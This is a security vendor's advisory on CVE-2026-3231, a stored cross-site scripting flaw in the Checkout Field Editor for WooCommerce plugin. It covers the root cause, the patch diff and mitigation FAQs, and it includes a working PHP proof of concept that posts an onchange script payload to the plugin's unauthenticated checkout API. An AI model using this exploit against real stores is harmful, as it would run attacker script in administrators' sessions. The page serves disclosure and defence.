Atomic Edge analysis of CVE-2026-3231:
The vulnerability is a stored cross-site scripting (XSS) flaw in the Checkout Field Editor for WooCommerce plugin. The root cause is a flawed sanitization sequence in the `prepare_single_field_data()` method within `class-thwcfd-block-order-data.php`. For radio and checkboxgroup field types, the method first applies `esc_html()` to user-supplied values, then immediately reverses that escaping with `html_entity_decode()`. This creates a situation where HTML entities are decoded back into raw HTML. The subsequent output uses `wp_kses()` with the `get_allowed_html()` function, which explicitly permits the “ element with the `onchange` event handler attribute. This permissive allowlist enables script execution. The attack vector is the WooCommerce Block Checkout Store API endpoint, which accepts unauthenticated POST requests during checkout. An attacker can submit a malicious payload within a custom radio or checkboxgroup field value. The payload is stored as order meta. When an administrator views the order details page in the WordPress dashboard, the plugin renders the field value, executing the injected JavaScript. The patch addresses the issue by removing the `html_entity_decode()` call for radio and checkboxgroup fields, ensuring `esc_html()`’s protection remains intact. It also introduces a new, stricter `get_allowed_html_order_output()` function that excludes event handler attributes like `onchange` from the “ element. Additionally, the patch adds server-side sanitization in `class-thwcfd-block.php` using `sanitize_text_field()` and `sanitize_textarea_field()` based on field type. These changes prevent HTML/script injection at both input and output stages.
Published : March 18, 2026
CVE-2026-3231: Checkout Field Editor (Checkout Manager) for WooCommerce <= 2.1.7 – Unauthenticated Stored Cross-Site Scripting via Block Checkout Custom Radio Field (woo-checkout-field-editor-pro)
CVE ID
CVE-2026-3231
Severity
High
(CVSS 7.2)
CWE
79
Vulnerable Version
2.1.7
Patched Version
2.1.8
Disclosed
March 9, 2026
Analysis Overview
Differential between vulnerable and patched code
Code Diff
--- a/woo-checkout-field-editor-pro/block/class-thwcfd-block-order-data.php
+++ b/woo-checkout-field-editor-pro/block/class-thwcfd-block-order-data.php
@@ -74,7 +74,7 @@
<?php
do_action( 'thwcfe_order_details_before_custom_fields', $order );
//echo $html;
- echo wp_kses($html, THWCFD_Utils::get_allowed_html());
+ echo wp_kses($html, THWCFD_Utils::get_allowed_html_order_output());
do_action( 'thwcfe_order_details_after_custom_fields', $order );
?>
</table>
@@ -111,7 +111,7 @@
if($html){
echo '<p style="clear: both; margin: 0 !important;"></p>';
- echo wp_kses($html, THWCFD_Utils::get_allowed_html());
+ echo wp_kses($html, THWCFD_Utils::get_allowed_html_order_output());
}
}
private function prepare_args_admin_order_view(){
@@ -218,7 +218,7 @@
}
if($html){
//echo $html;
- echo wp_kses($html, THWCFD_Utils::get_allowed_html());
+ echo wp_kses($html, THWCFD_Utils::get_allowed_html_order_output());
}
}
private function prepare_args_order_email($sent_to_admin){
@@ -437,9 +437,9 @@
$value = esc_html($value);
}
}
- if($type === 'checkboxgroup' || $type === 'radio'){
- $value = html_entity_decode($value);
- }
+ // if($type === 'checkboxgroup' || $type === 'radio'){
+ // $value = html_entity_decode($value);
+ // }
$field_data['label'] = $title;
//$field_data['sublabel'] = $subtitle;
--- a/woo-checkout-field-editor-pro/block/class-thwcfd-block.php
+++ b/woo-checkout-field-editor-pro/block/class-thwcfd-block.php
@@ -184,7 +184,7 @@
//$field['optionalLabel'] = $field_set[$key]['label']? $field_set[$key]['label'].' (optional)' : $field['optionalLabel'];
$field['optionalLabel'] = !empty($field_set[$key]['label']) ? sprintf(
/* translators: %s Field label. */
- __( '%s (optional)', 'woo-checkout-field-editor-pro' ),
+ __( '%s (optional)', 'woocommerce' ), //phpcs:disable WordPress.WP.I18n.TextDomainMismatch
$field_set[$key]['label']
) : $field['optionalLabel'];
}
@@ -365,11 +365,22 @@
continue;
}
$field = $section->fields[$field_key];
-
-
- if(is_array($field_value)){
+ $field_type = $field->property_set['type'] ? $field->property_set['type'] : 'text';
+
+ if (is_array($field_value)) {
+ $field_value = array_map('sanitize_text_field', $field_value);
$field_value = implode(', ', $field_value);
+ } else {
+ // Sanitize based on field type
+ if ($field_type === 'textarea') {
+ $field_value = sanitize_textarea_field($field_value);
+ } else {
+ $field_value = sanitize_text_field($field_value);
+ }
}
+ // if(is_array($field_value)){
+ // $field_value = implode(', ', $field_value);
+ // }
if (($field->property_set['order_meta'])) {
$order_meta_updates[$field_key] = $field_value;
$order_meta_fields[$field_key] = $field_value;
--- a/woo-checkout-field-editor-pro/checkout-form-designer.php
+++ b/woo-checkout-field-editor-pro/checkout-form-designer.php
@@ -3,14 +3,14 @@
* Plugin Name: Checkout Field Editor for WooCommerce
* Description: Customize WooCommerce checkout fields(Add, Edit, Delete and re-arrange fields).
* Author: ThemeHigh
- * Version: 2.1.7
+ * Version: 2.1.8
* Author URI: https://www.themehigh.com
* Plugin URI: https://www.themehigh.com
* License: GPLv2 or later
* Text Domain: woo-checkout-field-editor-pro
* Domain Path: /languages
* WC requires at least: 3.0.0
- * WC tested up to: 10.4
+ * WC tested up to: 10.5
*/
if(!defined( 'ABSPATH' )) exit;
@@ -26,7 +26,7 @@
}
if(is_woocommerce_active()) {
- define('THWCFD_VERSION', '2.1.7');
+ define('THWCFD_VERSION', '2.1.8');
!defined('THWCFD_BASE_NAME') && define('THWCFD_BASE_NAME', plugin_basename( __FILE__ ));
!defined('THWCFD_PATH') && define('THWCFD_PATH', plugin_dir_path( __FILE__ ));
!defined('THWCFD_URL') && define('THWCFD_URL', plugins_url( '/', __FILE__ ));
--- a/woo-checkout-field-editor-pro/includes/utils/class-thwcfd-utils-block.php
+++ b/woo-checkout-field-editor-pro/includes/utils/class-thwcfd-utils-block.php
@@ -241,43 +241,43 @@
public static function get_block_field_set(){
}
-
+ // phpcs:disable WordPress.WP.I18n.TextDomainMismatch
public static function prepare_default_fields($fields){
$field_objects = array();
- $default_fields_id = array(
- 'first_name' => array(
- 'label' => 'First name',
- ),
- 'last_name' => array(
- 'label' => 'Last name',
- ),
- 'company' => array(
- 'label' => 'Company name',
- ),
- 'country' => array(
- 'label' => 'Country / Region',
- ),
- 'address_1' => array(
- 'label' => 'Street address',
- 'placeholder' => 'House number and street name',
- ),
- 'address_2' => array(
- 'label' => 'Apartment, suite, unit, etc.',
- 'placeholder' => 'Apartment, suite, unit, etc. (optional)',
- ),
- 'city' => array(
- 'label' => 'Town / City',
- ),
- 'state' => array(
- 'label' => 'State / County',
- ),
- 'postcode' => array(
- 'label' => 'Postcode / ZIP',
- ),
- 'email' => array(
- 'label' => 'Email Address',
- )
- );
+ $default_fields_id = array(
+ 'first_name' => array(
+ 'label' => __( 'First name', 'woocommerce' ),
+ ),
+ 'last_name' => array(
+ 'label' => __( 'Last name', 'woocommerce' ),
+ ),
+ 'company' => array(
+ 'label' => __( 'Company name', 'woocommerce' ),
+ ),
+ 'country' => array(
+ 'label' => __( 'Country / Region', 'woocommerce' ),
+ ),
+ 'address_1' => array(
+ 'label' => __( 'Street address', 'woocommerce' ),
+ 'placeholder' => __( 'House number and street name', 'woocommerce' ),
+ ),
+ 'address_2' => array(
+ 'label' => __( 'Apartment, suite, unit, etc.', 'woocommerce' ),
+ 'placeholder' => __( 'Apartment, suite, unit, etc. (optional)', 'woocommerce' ),
+ ),
+ 'city' => array(
+ 'label' => __( 'Town / City', 'woocommerce' ),
+ ),
+ 'state' => array(
+ 'label' => __( 'State / County', 'woocommerce' ),
+ ),
+ 'postcode' => array(
+ 'label' => __( 'Postcode / ZIP', 'woocommerce' ),
+ ),
+ 'email' => array(
+ 'label' => __( 'Email address', 'woocommerce' ),
+ ),
+ );
if(is_array($fields)){
foreach($fields as $name => $field){
--- a/woo-checkout-field-editor-pro/includes/utils/class-thwcfd-utils.php
+++ b/woo-checkout-field-editor-pro/includes/utils/class-thwcfd-utils.php
@@ -510,6 +510,64 @@
return $allowed_html;
}
+ static function get_allowed_html_order_output() {
+ $allowed_html = array(
+ 'input' => array(
+ 'type' => array(),
+ 'id' => array(),
+ 'name' => array(),
+ 'value' => array(),
+ 'style' => array(),
+ 'checked' => array(),
+ 'class' => array(),
+ // No event handlers (onclick, onchange, etc.)
+ ),
+ 'label' => array(
+ 'for' => array(),
+ 'style' => array(),
+ ),
+ 'textarea' => array(
+ 'name' => array(),
+ 'rows' => array(),
+ 'cols' => array(),
+ 'style' => array(),
+ // No event handlers
+ ),
+ 'select' => array(
+ 'name' => array(),
+ 'style' => array(),
+ 'class' => array(),
+ 'multiple' => array(),
+ 'placeholder' => array(),
+ // onchange intentionally excluded — user-supplied values rendered here
+ ),
+ 'option' => array(
+ 'value' => array(),
+ ),
+ 'th' => array(
+ 'colspan' => array(),
+ 'rowspan' => array(),
+ 'style' => array(),
+ 'class' => array(),
+ ),
+ 'tr' => array(
+ 'style' => array(),
+ 'class' => array(),
+ ),
+ 'td' => array(
+ 'colspan' => array(),
+ 'rowspan' => array(),
+ 'style' => array(),
+ 'class' => array(),
+ ),
+ 'h3' => array(),
+ 'p' => array(),
+ 'strong' => array(),
+ 'br' => array(),
+ );
+ return $allowed_html;
+ }
+
public static function convert_string_to_array($str, $separator = ','){
if(!is_array($str)){
$str = array_map('trim', explode($separator, $str));Proof of Concept (PHP)
NOTICE :
This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-3231 - Checkout Field Editor (Checkout Manager) for WooCommerce <= 2.1.7 - Unauthenticated Stored Cross-Site Scripting via Block Checkout Custom Radio Field
<?php
$target_url = 'http://vulnerable-site.com/wp-json/wc/store/v1/checkout';
// Payload to execute JavaScript alert in admin context.
// The payload uses HTML entities to bypass initial esc_html(), which are later decoded.
$payload = '<select onchange=alert(document.domain)><option>test</option></select>';
// JSON payload for the Store API checkout endpoint.
$data = array(
'billing_address' => array(
'first_name' => 'John',
'last_name' => 'Doe',
'email' => 'attacker@example.com'
),
'shipping_address' => array(
'first_name' => 'John',
'last_name' => 'Doe'
),
'create_account' => false,
'payment_method' => 'cod',
'extensions' => array(
'checkout-field-editor' => array(
// This key must match a custom radio or checkboxgroup field key configured in the plugin.
// Replace 'custom_radio_field' with the actual field key.
'custom_radio_field' => $payload
)
)
);
$ch = curl_init($target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Content-Type: application/json',
'Accept: application/json'
));
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
echo "HTTP Response Code: $http_coden";
echo "Response: $responsen";
if ($http_code == 200) {
echo "Payload likely submitted successfully.n";
echo "When an administrator views the corresponding order in the WordPress dashboard, the JavaScript will execute.n";
} else {
echo "Request failed. Ensure the site uses WooCommerce Blocks and has a custom radio/checkboxgroup field with the correct key.n";
}
?>Frequently Asked Questions
What is CVE-2026-3231?
Understanding the VulnerabilityCVE-2026-3231 is a stored cross-site scripting (XSS) vulnerability in the Checkout Field Editor for WooCommerce plugin. It allows unauthenticated attackers to inject malicious scripts via custom radio and checkboxgroup fields during checkout, which can execute when an administrator views the order details.
How does the vulnerability work?
Mechanism of ExploitationThe vulnerability arises from improper sanitization in the `prepare_single_field_data()` method. User inputs are first escaped and then decoded, allowing attackers to inject scripts that are rendered in the admin interface when viewing order details.
Who is affected by this vulnerability?
Identifying Vulnerable InstallationsAny WordPress site using the Checkout Field Editor for WooCommerce plugin version 2.1.7 or earlier is affected. Administrators should check their plugin version to determine if they need to take action.
How can I check if my site is vulnerable?
Version VerificationTo check if your site is vulnerable, navigate to the Plugins section in your WordPress admin dashboard and look for the Checkout Field Editor for WooCommerce plugin. If the version is 2.1.7 or lower, your site is at risk.
How can I fix this vulnerability?
Updating the PluginThe vulnerability is fixed in version 2.1.8 of the plugin. Administrators should update to this version or higher to mitigate the risk of exploitation.
What if I cannot update the plugin immediately?
Mitigation StrategiesIf an immediate update is not possible, consider disabling the plugin or restricting access to the WooCommerce Block Checkout Store API. Additionally, review order details regularly for any suspicious entries.
What does a CVSS score of 7.2 indicate?
Understanding Severity LevelsA CVSS score of 7.2 indicates a high severity vulnerability. This means that the vulnerability poses a significant risk and should be addressed promptly to prevent potential exploitation.
What are the practical risks of this vulnerability?
Potential Impact on Your SiteIf exploited, this vulnerability could allow attackers to execute arbitrary scripts in the admin context, leading to data theft, unauthorized actions, or site compromise. It is crucial to address the vulnerability to protect your site and its data.
How does the proof of concept demonstrate the issue?
Example of ExploitationThe proof of concept illustrates how an attacker can submit a crafted payload through the WooCommerce Block Checkout API. This payload, when viewed by an administrator, can execute JavaScript, demonstrating the XSS vulnerability in action.
Where can I find more information about this vulnerability?
Resources for Further ReadingFurther information can be found in the official CVE database, security advisories from the plugin developers, and security forums discussing the implications and mitigation strategies for CVE-2026-3231.
How Atomic Edge Works
Simple Setup. Powerful Security.
Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.
Trusted by Developers & Organizations
